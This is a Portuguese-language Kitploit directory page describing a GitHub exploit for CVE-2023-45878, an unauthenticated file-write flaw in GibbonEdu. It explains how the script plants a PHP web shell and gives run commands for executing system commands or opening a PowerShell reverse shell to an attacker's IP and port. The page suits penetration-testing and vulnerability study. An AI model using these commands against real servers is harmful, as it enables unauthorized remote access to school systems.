Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-45878 — GibbonEdu Escrita Arbitrária de Arquivos para Execução Remota de Código | Kitploit
Ferramentas/GitHubGitHub/davidzzo23/cve-2023-45878
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubdavidzzo23/cve-2023-45878

CVE-2023-45878

GibbonEdu Escrita Arbitrária de Arquivos para Execução Remota de Código

Ver Repositório
32há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-45878

GibbonEdu Gravação Arbitrária de Arquivos para Execução de Web Shell

Descrição

Este repositório contém um exploit para a CVE-2023-45878, uma vulnerabilidade de gravação arbitrária de arquivos no GibbonEdu. A vulnerabilidade afeta o endpoint rubrics_visualise_saveAjax.php e permite que um atacante não autenticado envie arquivos arbitrários para o servidor web.

Este script aproveita a vulnerabilidade para enviar um web shell em PHP e pode:

  • Executar um comando específico do sistema;
  • Acionar um reverse shell do PowerShell codificado em base64 para obter acesso remoto.

Uso

O script suporta dois modos de operação:

  • --command (-c): Executa um comando específico do sistema remotamente.
  • --shell (-s): Aciona um reverse shell do PowerShell para o listener do atacante.

Como Executar o Exploit

1. Clone o Repositório

root@kitploit:~
git clone https://github.com/davidzzo23/CVE-2023-45878.git
cd CVE-2023-45878

2. Execute o Exploit de Web Shell

  • Executar um Comando Remoto:
root@kitploit:~
python3 CVE-2023-45878.py -t <target_domain> -c "whoami"
  • Acionar um Reverse Shell do PowerShell:
root@kitploit:~
python3 CVE-2023-45878.py -t <target_domain> -s -i <ip> -p <port>

Aviso Legal

Este script destina-se apenas a fins educacionais. O uso não autorizado deste exploit em sistemas sem permissão é ilegal. O autor não é responsável por qualquer uso indevido ou danos causados por este exploit.

Baixar ferramenta